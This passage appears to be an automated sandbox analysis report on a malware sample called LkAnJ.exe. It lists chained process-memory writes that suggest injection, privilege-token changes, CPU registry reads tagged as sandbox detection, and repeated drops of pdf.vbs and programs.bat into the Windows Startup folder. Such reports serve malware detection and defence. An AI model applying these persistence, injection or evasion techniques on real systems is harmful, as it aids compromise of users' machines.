PID 3340 wrote to memory of 2188	3340	LkAnJ.exe	208
PID 3340 wrote to memory of 2188	3340	LkAnJ.exe	208
PID 3340 wrote to memory of 2188	3340	LkAnJ.exe	208
PID 3340 wrote to memory of 4480	3340	LkAnJ.exe	209
PID 3340 wrote to memory of 4480	3340	LkAnJ.exe	209
PID 3340 wrote to memory of 4480	3340	LkAnJ.exe	209
PID 3340 wrote to memory of 3788	3340	LkAnJ.exe	210
PID 3340 wrote to memory of 3788	3340	LkAnJ.exe	210
PID 3340 wrote to memory of 3788	3340	LkAnJ.exe	210
PID 3788 wrote to memory of 4372	3788	LkAnJ.exe	211
PID 3788 wrote to memory of 4372	3788	LkAnJ.exe	211
PID 3788 wrote to memory of 4372	3788	LkAnJ.exe	211
PID 4372 wrote to memory of 4596	4372	LkAnJ.exe	212
PID 4372 wrote to memory of 4596	4372	LkAnJ.exe	212
PID 4372 wrote to memory of 4596	4372	LkAnJ.exe	212
PID 4372 wrote to memory of 4596	4372	LkAnJ.exe	212
PID 4372 wrote to memory of 4596	4372	LkAnJ.exe	212
PID 4372 wrote to memory of 4644	4372	LkAnJ.exe	213
PID 4372 wrote to memory of 4644	4372	LkAnJ.exe	213
PID 4372 wrote to memory of 4644	4372	LkAnJ.exe	213
PID 4372 wrote to memory of 4588	4372	LkAnJ.exe	214
PID 4372 wrote to memory of 4588	4372	LkAnJ.exe	214
PID 4372 wrote to memory of 4588	4372	LkAnJ.exe	214
PID 4588 wrote to memory of 4720	4588	LkAnJ.exe	215
PID 4588 wrote to memory of 4720	4588	LkAnJ.exe	215
PID 4588 wrote to memory of 4720	4588	LkAnJ.exe	215
PID 4720 wrote to memory of 4668	4720	LkAnJ.exe	216
PID 4720 wrote to memory of 4668	4720	LkAnJ.exe	216
PID 4720 wrote to memory of 4668	4720	LkAnJ.exe	216
PID 4720 wrote to memory of 4668	4720	LkAnJ.exe	216
PID 4720 wrote to memory of 4668	4720	LkAnJ.exe	216
PID 4720 wrote to memory of 4740	4720	LkAnJ.exe	217
PID 4720 wrote to memory of 4740	4720	LkAnJ.exe	217
PID 4720 wrote to memory of 4740	4720	LkAnJ.exe	217
PID 4720 wrote to memory of 4796	4720	LkAnJ.exe	218
PID 4720 wrote to memory of 4796	4720	LkAnJ.exe	218
PID 4720 wrote to memory of 4796	4720	LkAnJ.exe	218
PID 4796 wrote to memory of 4748	4796	LkAnJ.exe	219
PID 4796 wrote to memory of 4748	4796	LkAnJ.exe	219
PID 4796 wrote to memory of 4748	4796	LkAnJ.exe	219
PID 4748 wrote to memory of 4836	4748	LkAnJ.exe	220
PID 4748 wrote to memory of 4836	4748	LkAnJ.exe	220
PID 4748 wrote to memory of 4836	4748	LkAnJ.exe	220
PID 4748 wrote to memory of 4836	4748	LkAnJ.exe	220
PID 4748 wrote to memory of 4836	4748	LkAnJ.exe	220
PID 4748 wrote to memory of 4808	4748	LkAnJ.exe	221
PID 4748 wrote to memory of 4808	4748	LkAnJ.exe	221
PID 4748 wrote to memory of 4808	4748	LkAnJ.exe	221
PID 4748 wrote to memory of 4824	4748	LkAnJ.exe	222
PID 4748 wrote to memory of 4824	4748	LkAnJ.exe	222
PID 4748 wrote to memory of 4824	4748	LkAnJ.exe	222
PID 4824 wrote to memory of 4976	4824	LkAnJ.exe	223
PID 4824 wrote to memory of 4976	4824	LkAnJ.exe	223
PID 4824 wrote to memory of 4976	4824	LkAnJ.exe	223
PID 4976 wrote to memory of 4924	4976	LkAnJ.exe	224
PID 4976 wrote to memory of 4924	4976	LkAnJ.exe	224
PID 4976 wrote to memory of 4924	4976	LkAnJ.exe	224
PID 4976 wrote to memory of 4924	4976	LkAnJ.exe	224
PID 4976 wrote to memory of 4924	4976	LkAnJ.exe	224
PID 4976 wrote to memory of 4984	4976	LkAnJ.exe	225
PID 4976 wrote to memory of 4984	4976	LkAnJ.exe	225
PID 4976 wrote to memory of 4984	4976	LkAnJ.exe	225
PID 4976 wrote to memory of 4928	4976	LkAnJ.exe	226
PID 4976 wrote to memory of 4928	4976	LkAnJ.exe	226
PID 4976 wrote to memory of 4928	4976	LkAnJ.exe	226
PID 4928 wrote to memory of 5008	4928	LkAnJ.exe	227
PID 4928 wrote to memory of 5008	4928	LkAnJ.exe	227
PID 4928 wrote to memory of 5008	4928	LkAnJ.exe	227
PID 5008 wrote to memory of 4560	5008	LkAnJ.exe	228
PID 5008 wrote to memory of 4560	5008	LkAnJ.exe	228
PID 5008 wrote to memory of 4560	5008	LkAnJ.exe	228
PID 5008 wrote to memory of 4560	5008	LkAnJ.exe	228
PID 5008 wrote to memory of 4560	5008	LkAnJ.exe	228
PID 5008 wrote to memory of 4572	5008	LkAnJ.exe	229
PID 5008 wrote to memory of 4572	5008	LkAnJ.exe	229
PID 5008 wrote to memory of 4572	5008	LkAnJ.exe	229
PID 5008 wrote to memory of 3964	5008	LkAnJ.exe	230
PID 5008 wrote to memory of 3964	5008	LkAnJ.exe	230
PID 5008 wrote to memory of 3964	5008	LkAnJ.exe	230
PID 3964 wrote to memory of 5060	3964	LkAnJ.exe	231
PID 3964 wrote to memory of 5060	3964	LkAnJ.exe	231
PID 3964 wrote to memory of 5060	3964	LkAnJ.exe	231
PID 5060 wrote to memory of 5048	5060	LkAnJ.exe	232
PID 5060 wrote to memory of 5048	5060	LkAnJ.exe	232
PID 5060 wrote to memory of 5048	5060	LkAnJ.exe	232
PID 5060 wrote to memory of 5048	5060	LkAnJ.exe	232
PID 5060 wrote to memory of 5048	5060	LkAnJ.exe	232
PID 5060 wrote to memory of 1872	5060	LkAnJ.exe	233
PID 5060 wrote to memory of 1872	5060	LkAnJ.exe	233
PID 5060 wrote to memory of 1872	5060	LkAnJ.exe	233
PID 5060 wrote to memory of 5116	5060	LkAnJ.exe	234
PID 5060 wrote to memory of 5116	5060	LkAnJ.exe	234
PID 5060 wrote to memory of 5116	5060	LkAnJ.exe	234
PID 5116 wrote to memory of 3336	5116	LkAnJ.exe	235
PID 5116 wrote to memory of 3336	5116	LkAnJ.exe	235
PID 5116 wrote to memory of 3336	5116	LkAnJ.exe	235
PID 3336 wrote to memory of 4112	3336	LkAnJ.exe	236
PID 3336 wrote to memory of 4112	3336	LkAnJ.exe	236
PID 3336 wrote to memory of 4112	3336	LkAnJ.exe	236
PID 3336 wrote to memory of 4112	3336	LkAnJ.exe	236
PID 3336 wrote to memory of 4112	3336	LkAnJ.exe	236
PID 3336 wrote to memory of 4152	3336	LkAnJ.exe	237
PID 3336 wrote to memory of 4152	3336	LkAnJ.exe	237
PID 3336 wrote to memory of 4152	3336	LkAnJ.exe	237
PID 3336 wrote to memory of 4244	3336	LkAnJ.exe	238
PID 3336 wrote to memory of 4244	3336	LkAnJ.exe	238
PID 3336 wrote to memory of 4244	3336	LkAnJ.exe	238
PID 4244 wrote to memory of 3748	4244	LkAnJ.exe	239
PID 4244 wrote to memory of 3748	4244	LkAnJ.exe	239
PID 4244 wrote to memory of 3748	4244	LkAnJ.exe	239
PID 3748 wrote to memory of 4292	3748	LkAnJ.exe	240
PID 3748 wrote to memory of 4292	3748	LkAnJ.exe	240
PID 3748 wrote to memory of 4292	3748	LkAnJ.exe	240
PID 3748 wrote to memory of 4292	3748	LkAnJ.exe	240
PID 3748 wrote to memory of 4292	3748	LkAnJ.exe	240
PID 3748 wrote to memory of 4308	3748	LkAnJ.exe	241
PID 3748 wrote to memory of 4308	3748	LkAnJ.exe	241
PID 3748 wrote to memory of 4308	3748	LkAnJ.exe	241
PID 3748 wrote to memory of 4168	3748	LkAnJ.exe	242
PID 3748 wrote to memory of 4168	3748	LkAnJ.exe	242
PID 3748 wrote to memory of 4168	3748	LkAnJ.exe	242
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	243
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	243
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	243
PID 4296 wrote to memory of 1544	4296	LkAnJ.exe	244
PID 4296 wrote to memory of 1544	4296	LkAnJ.exe	244
PID 4296 wrote to memory of 1544	4296	LkAnJ.exe	244
PID 4296 wrote to memory of 1544	4296	LkAnJ.exe	244
PID 4296 wrote to memory of 1544	4296	LkAnJ.exe	244
PID 4296 wrote to memory of 4356	4296	LkAnJ.exe	245
PID 4296 wrote to memory of 4356	4296	LkAnJ.exe	245
PID 4296 wrote to memory of 4356	4296	LkAnJ.exe	245
PID 4296 wrote to memory of 4224	4296	LkAnJ.exe	246
PID 4296 wrote to memory of 4224	4296	LkAnJ.exe	246
PID 4296 wrote to memory of 4224	4296	LkAnJ.exe	246
PID 4224 wrote to memory of 4424	4224	LkAnJ.exe	247
PID 4224 wrote to memory of 4424	4224	LkAnJ.exe	247
PID 4224 wrote to memory of 4424	4224	LkAnJ.exe	247
PID 4424 wrote to memory of 604	4424	LkAnJ.exe	248
PID 4424 wrote to memory of 604	4424	LkAnJ.exe	248
PID 4424 wrote to memory of 604	4424	LkAnJ.exe	248
PID 4424 wrote to memory of 604	4424	LkAnJ.exe	248
PID 4424 wrote to memory of 604	4424	LkAnJ.exe	248
PID 4424 wrote to memory of 4468	4424	LkAnJ.exe	249
PID 4424 wrote to memory of 4468	4424	LkAnJ.exe	249
PID 4424 wrote to memory of 4468	4424	LkAnJ.exe	249
PID 4424 wrote to memory of 4432	4424	LkAnJ.exe	250
PID 4424 wrote to memory of 4432	4424	LkAnJ.exe	250
PID 4424 wrote to memory of 4432	4424	LkAnJ.exe	250
PID 4432 wrote to memory of 2496	4432	LkAnJ.exe	251
PID 4432 wrote to memory of 2496	4432	LkAnJ.exe	251
PID 4432 wrote to memory of 2496	4432	LkAnJ.exe	251
PID 2496 wrote to memory of 4060	2496	LkAnJ.exe	252
PID 2496 wrote to memory of 4060	2496	LkAnJ.exe	252
PID 2496 wrote to memory of 4060	2496	LkAnJ.exe	252
PID 2496 wrote to memory of 4060	2496	LkAnJ.exe	252
PID 2496 wrote to memory of 4060	2496	LkAnJ.exe	252
PID 2496 wrote to memory of 1796	2496	LkAnJ.exe	253
PID 2496 wrote to memory of 1796	2496	LkAnJ.exe	253
PID 2496 wrote to memory of 1796	2496	LkAnJ.exe	253
PID 2496 wrote to memory of 1360	2496	LkAnJ.exe	254
PID 2496 wrote to memory of 1360	2496	LkAnJ.exe	254
PID 2496 wrote to memory of 1360	2496	LkAnJ.exe	254
PID 1360 wrote to memory of 1996	1360	LkAnJ.exe	255
PID 1360 wrote to memory of 1996	1360	LkAnJ.exe	255
PID 1360 wrote to memory of 1996	1360	LkAnJ.exe	255
PID 1996 wrote to memory of 4048	1996	LkAnJ.exe	256
PID 1996 wrote to memory of 4048	1996	LkAnJ.exe	256
PID 1996 wrote to memory of 4048	1996	LkAnJ.exe	256
PID 1996 wrote to memory of 4048	1996	LkAnJ.exe	256
PID 1996 wrote to memory of 4048	1996	LkAnJ.exe	256
PID 1996 wrote to memory of 3452	1996	LkAnJ.exe	257
PID 1996 wrote to memory of 3452	1996	LkAnJ.exe	257
PID 1996 wrote to memory of 3452	1996	LkAnJ.exe	257
PID 1996 wrote to memory of 4100	1996	LkAnJ.exe	258
PID 1996 wrote to memory of 4100	1996	LkAnJ.exe	258
PID 1996 wrote to memory of 4100	1996	LkAnJ.exe	258
PID 4100 wrote to memory of 1684	4100	LkAnJ.exe	259
PID 4100 wrote to memory of 1684	4100	LkAnJ.exe	259
PID 4100 wrote to memory of 1684	4100	LkAnJ.exe	259
PID 1684 wrote to memory of 4504	1684	LkAnJ.exe	260
PID 1684 wrote to memory of 4504	1684	LkAnJ.exe	260
PID 1684 wrote to memory of 4504	1684	LkAnJ.exe	260
PID 1684 wrote to memory of 4504	1684	LkAnJ.exe	260
PID 1684 wrote to memory of 4504	1684	LkAnJ.exe	260
PID 1684 wrote to memory of 1296	1684	LkAnJ.exe	261
PID 1684 wrote to memory of 1296	1684	LkAnJ.exe	261
PID 1684 wrote to memory of 1296	1684	LkAnJ.exe	261
PID 1684 wrote to memory of 4444	1684	LkAnJ.exe	262
PID 1684 wrote to memory of 4444	1684	LkAnJ.exe	262
PID 1684 wrote to memory of 4444	1684	LkAnJ.exe	262
PID 4444 wrote to memory of 2168	4444	LkAnJ.exe	263
PID 4444 wrote to memory of 2168	4444	LkAnJ.exe	263
PID 4444 wrote to memory of 2168	4444	LkAnJ.exe	263
PID 2168 wrote to memory of 1432	2168	LkAnJ.exe	264
PID 2168 wrote to memory of 1432	2168	LkAnJ.exe	264
PID 2168 wrote to memory of 1432	2168	LkAnJ.exe	264
PID 2168 wrote to memory of 1432	2168	LkAnJ.exe	264
PID 2168 wrote to memory of 1432	2168	LkAnJ.exe	264
PID 2168 wrote to memory of 4472	2168	LkAnJ.exe	265
PID 2168 wrote to memory of 4472	2168	LkAnJ.exe	265
PID 2168 wrote to memory of 4472	2168	LkAnJ.exe	265
PID 2168 wrote to memory of 4600	2168	LkAnJ.exe	266
PID 2168 wrote to memory of 4600	2168	LkAnJ.exe	266
PID 2168 wrote to memory of 4600	2168	LkAnJ.exe	266
PID 4600 wrote to memory of 4616	4600	LkAnJ.exe	267
PID 4600 wrote to memory of 4616	4600	LkAnJ.exe	267
PID 4600 wrote to memory of 4616	4600	LkAnJ.exe	267
PID 4616 wrote to memory of 4688	4616	LkAnJ.exe	268
PID 4616 wrote to memory of 4688	4616	LkAnJ.exe	268
PID 4616 wrote to memory of 4688	4616	LkAnJ.exe	268
PID 4616 wrote to memory of 4688	4616	LkAnJ.exe	268
PID 4616 wrote to memory of 4688	4616	LkAnJ.exe	268
PID 4616 wrote to memory of 4676	4616	LkAnJ.exe	269
PID 4616 wrote to memory of 4676	4616	LkAnJ.exe	269
PID 4616 wrote to memory of 4676	4616	LkAnJ.exe	269
PID 4616 wrote to memory of 4760	4616	LkAnJ.exe	270
PID 4616 wrote to memory of 4760	4616	LkAnJ.exe	270
PID 4616 wrote to memory of 4760	4616	LkAnJ.exe	270
PID 4760 wrote to memory of 1088	4760	LkAnJ.exe	271
PID 4760 wrote to memory of 1088	4760	LkAnJ.exe	271
PID 4760 wrote to memory of 1088	4760	LkAnJ.exe	271
PID 1088 wrote to memory of 4780	1088	LkAnJ.exe	272
PID 1088 wrote to memory of 4780	1088	LkAnJ.exe	272
PID 1088 wrote to memory of 4780	1088	LkAnJ.exe	272
PID 1088 wrote to memory of 4780	1088	LkAnJ.exe	272
PID 1088 wrote to memory of 4780	1088	LkAnJ.exe	272
PID 1088 wrote to memory of 4796	1088	LkAnJ.exe	273
PID 1088 wrote to memory of 4796	1088	LkAnJ.exe	273
PID 1088 wrote to memory of 4796	1088	LkAnJ.exe	273
PID 1088 wrote to memory of 4832	1088	LkAnJ.exe	274
PID 1088 wrote to memory of 4832	1088	LkAnJ.exe	274
PID 1088 wrote to memory of 4832	1088	LkAnJ.exe	274
PID 4832 wrote to memory of 4948	4832	LkAnJ.exe	277
PID 4832 wrote to memory of 4948	4832	LkAnJ.exe	277
PID 4832 wrote to memory of 4948	4832	LkAnJ.exe	277
PID 4948 wrote to memory of 3084	4948	LkAnJ.exe	278
PID 4948 wrote to memory of 3084	4948	LkAnJ.exe	278
PID 4948 wrote to memory of 3084	4948	LkAnJ.exe	278
PID 4948 wrote to memory of 3084	4948	LkAnJ.exe	278
PID 4948 wrote to memory of 3084	4948	LkAnJ.exe	278
PID 4948 wrote to memory of 5032	4948	LkAnJ.exe	279
PID 4948 wrote to memory of 5032	4948	LkAnJ.exe	279
PID 4948 wrote to memory of 5032	4948	LkAnJ.exe	279
PID 4948 wrote to memory of 3540	4948	LkAnJ.exe	280
PID 4948 wrote to memory of 3540	4948	LkAnJ.exe	280
PID 4948 wrote to memory of 3540	4948	LkAnJ.exe	280
PID 3540 wrote to memory of 5020	3540	LkAnJ.exe	281
PID 3540 wrote to memory of 5020	3540	LkAnJ.exe	281
PID 3540 wrote to memory of 5020	3540	LkAnJ.exe	281
PID 5020 wrote to memory of 4560	5020	LkAnJ.exe	282
PID 5020 wrote to memory of 4560	5020	LkAnJ.exe	282
PID 5020 wrote to memory of 4560	5020	LkAnJ.exe	282
PID 5020 wrote to memory of 4560	5020	LkAnJ.exe	282
PID 5020 wrote to memory of 4560	5020	LkAnJ.exe	282
PID 5020 wrote to memory of 4024	5020	LkAnJ.exe	283
PID 5020 wrote to memory of 4024	5020	LkAnJ.exe	283
PID 5020 wrote to memory of 4024	5020	LkAnJ.exe	283
PID 5020 wrote to memory of 5056	5020	LkAnJ.exe	284
PID 5020 wrote to memory of 5056	5020	LkAnJ.exe	284
PID 5020 wrote to memory of 5056	5020	LkAnJ.exe	284
PID 5056 wrote to memory of 5044	5056	LkAnJ.exe	285
PID 5056 wrote to memory of 5044	5056	LkAnJ.exe	285
PID 5056 wrote to memory of 5044	5056	LkAnJ.exe	285
PID 5044 wrote to memory of 5004	5044	LkAnJ.exe	286
PID 5044 wrote to memory of 5004	5044	LkAnJ.exe	286
PID 5044 wrote to memory of 5004	5044	LkAnJ.exe	286
PID 5044 wrote to memory of 5004	5044	LkAnJ.exe	286
PID 5044 wrote to memory of 5004	5044	LkAnJ.exe	286
PID 5044 wrote to memory of 4108	5044	LkAnJ.exe	287
PID 5044 wrote to memory of 4108	5044	LkAnJ.exe	287
PID 5044 wrote to memory of 4108	5044	LkAnJ.exe	287
PID 5044 wrote to memory of 5080	5044	LkAnJ.exe	288
PID 5044 wrote to memory of 5080	5044	LkAnJ.exe	288
PID 5044 wrote to memory of 5080	5044	LkAnJ.exe	288
PID 5080 wrote to memory of 3644	5080	LkAnJ.exe	289
PID 5080 wrote to memory of 3644	5080	LkAnJ.exe	289
PID 5080 wrote to memory of 3644	5080	LkAnJ.exe	289
PID 3644 wrote to memory of 3336	3644	LkAnJ.exe	290
PID 3644 wrote to memory of 3336	3644	LkAnJ.exe	290
PID 3644 wrote to memory of 3336	3644	LkAnJ.exe	290
PID 3644 wrote to memory of 3336	3644	LkAnJ.exe	290
PID 3644 wrote to memory of 3336	3644	LkAnJ.exe	290
PID 3644 wrote to memory of 4128	3644	LkAnJ.exe	291
PID 3644 wrote to memory of 4128	3644	LkAnJ.exe	291
PID 3644 wrote to memory of 4128	3644	LkAnJ.exe	291
PID 3644 wrote to memory of 4216	3644	LkAnJ.exe	292
PID 3644 wrote to memory of 4216	3644	LkAnJ.exe	292
PID 3644 wrote to memory of 4216	3644	LkAnJ.exe	292
PID 4216 wrote to memory of 4272	4216	LkAnJ.exe	293
PID 4216 wrote to memory of 4272	4216	LkAnJ.exe	293
PID 4216 wrote to memory of 4272	4216	LkAnJ.exe	293
PID 4272 wrote to memory of 4172	4272	LkAnJ.exe	294
PID 4272 wrote to memory of 4172	4272	LkAnJ.exe	294
PID 4272 wrote to memory of 4172	4272	LkAnJ.exe	294
PID 4272 wrote to memory of 4172	4272	LkAnJ.exe	294
PID 4272 wrote to memory of 4172	4272	LkAnJ.exe	294
PID 4272 wrote to memory of 4292	4272	LkAnJ.exe	295
PID 4272 wrote to memory of 4292	4272	LkAnJ.exe	295
PID 4272 wrote to memory of 4292	4272	LkAnJ.exe	295
PID 4272 wrote to memory of 4304	4272	LkAnJ.exe	296
PID 4272 wrote to memory of 4304	4272	LkAnJ.exe	296
PID 4272 wrote to memory of 4304	4272	LkAnJ.exe	296
PID 4304 wrote to memory of 1908	4304	LkAnJ.exe	297
PID 4304 wrote to memory of 1908	4304	LkAnJ.exe	297
PID 4304 wrote to memory of 1908	4304	LkAnJ.exe	297
PID 1908 wrote to memory of 3648	1908	LkAnJ.exe	298
PID 1908 wrote to memory of 3648	1908	LkAnJ.exe	298
PID 1908 wrote to memory of 3648	1908	LkAnJ.exe	298
PID 1908 wrote to memory of 3648	1908	LkAnJ.exe	298
PID 1908 wrote to memory of 3648	1908	LkAnJ.exe	298
PID 1908 wrote to memory of 1544	1908	LkAnJ.exe	299
PID 1908 wrote to memory of 1544	1908	LkAnJ.exe	299
PID 1908 wrote to memory of 1544	1908	LkAnJ.exe	299
PID 1908 wrote to memory of 4260	1908	LkAnJ.exe	300
PID 1908 wrote to memory of 4260	1908	LkAnJ.exe	300
PID 1908 wrote to memory of 4260	1908	LkAnJ.exe	300
PID 4260 wrote to memory of 4228	4260	LkAnJ.exe	301
PID 4260 wrote to memory of 4228	4260	LkAnJ.exe	301
PID 4260 wrote to memory of 4228	4260	LkAnJ.exe	301
PID 4228 wrote to memory of 4500	4228	LkAnJ.exe	302
PID 4228 wrote to memory of 4500	4228	LkAnJ.exe	302
PID 4228 wrote to memory of 4500	4228	LkAnJ.exe	302
PID 4228 wrote to memory of 4500	4228	LkAnJ.exe	302
PID 4228 wrote to memory of 4500	4228	LkAnJ.exe	302
PID 4228 wrote to memory of 3012	4228	LkAnJ.exe	303
PID 4228 wrote to memory of 3012	4228	LkAnJ.exe	303
PID 4228 wrote to memory of 3012	4228	LkAnJ.exe	303
PID 4228 wrote to memory of 4460	4228	LkAnJ.exe	304
PID 4228 wrote to memory of 4460	4228	LkAnJ.exe	304
PID 4228 wrote to memory of 4460	4228	LkAnJ.exe	304
PID 4460 wrote to memory of 2744	4460	LkAnJ.exe	305
PID 4460 wrote to memory of 2744	4460	LkAnJ.exe	305
PID 4460 wrote to memory of 2744	4460	LkAnJ.exe	305
PID 2744 wrote to memory of 4060	2744	LkAnJ.exe	306
PID 2744 wrote to memory of 4060	2744	LkAnJ.exe	306
PID 2744 wrote to memory of 4060	2744	LkAnJ.exe	306
PID 2744 wrote to memory of 4060	2744	LkAnJ.exe	306
PID 2744 wrote to memory of 4060	2744	LkAnJ.exe	306
PID 2744 wrote to memory of 632	2744	LkAnJ.exe	307
PID 2744 wrote to memory of 632	2744	LkAnJ.exe	307
PID 2744 wrote to memory of 632	2744	LkAnJ.exe	307
PID 2744 wrote to memory of 492	2744	LkAnJ.exe	308
PID 2744 wrote to memory of 492	2744	LkAnJ.exe	308
PID 2744 wrote to memory of 492	2744	LkAnJ.exe	308
PID 492 wrote to memory of 2044	492	LkAnJ.exe	309
PID 492 wrote to memory of 2044	492	LkAnJ.exe	309
PID 492 wrote to memory of 2044	492	LkAnJ.exe	309
PID 2044 wrote to memory of 1080	2044	LkAnJ.exe	310
PID 2044 wrote to memory of 1080	2044	LkAnJ.exe	310
PID 2044 wrote to memory of 1080	2044	LkAnJ.exe	310
PID 2044 wrote to memory of 1080	2044	LkAnJ.exe	310
PID 2044 wrote to memory of 1080	2044	LkAnJ.exe	310
PID 2044 wrote to memory of 408	2044	LkAnJ.exe	311
PID 2044 wrote to memory of 408	2044	LkAnJ.exe	311
PID 2044 wrote to memory of 408	2044	LkAnJ.exe	311
PID 2044 wrote to memory of 3904	2044	LkAnJ.exe	312
PID 2044 wrote to memory of 3904	2044	LkAnJ.exe	312
PID 2044 wrote to memory of 3904	2044	LkAnJ.exe	312
PID 3904 wrote to memory of 1308	3904	LkAnJ.exe	313
PID 3904 wrote to memory of 1308	3904	LkAnJ.exe	313
PID 3904 wrote to memory of 1308	3904	LkAnJ.exe	313
PID 1308 wrote to memory of 4504	1308	LkAnJ.exe	314
PID 1308 wrote to memory of 4504	1308	LkAnJ.exe	314
PID 1308 wrote to memory of 4504	1308	LkAnJ.exe	314
PID 1308 wrote to memory of 4504	1308	LkAnJ.exe	314
PID 1308 wrote to memory of 4504	1308	LkAnJ.exe	314
PID 1308 wrote to memory of 4556	1308	LkAnJ.exe	315
PID 1308 wrote to memory of 4556	1308	LkAnJ.exe	315
PID 1308 wrote to memory of 4556	1308	LkAnJ.exe	315
PID 1308 wrote to memory of 4636	1308	LkAnJ.exe	316
PID 1308 wrote to memory of 4636	1308	LkAnJ.exe	316
PID 1308 wrote to memory of 4636	1308	LkAnJ.exe	316

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeRestorePrivilege	1000	WerFault.exe
Token: SeBackupPrivilege	1000	WerFault.exe
Token: SeDebugPrivilege	1000	WerFault.exe
Token: SeDebugPrivilege	2208	powershell.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x00030000000006c7-208.dat	js

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Drops startup file 59 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat	LkAnJ.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start	LkAnJ.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs	notepad.exe
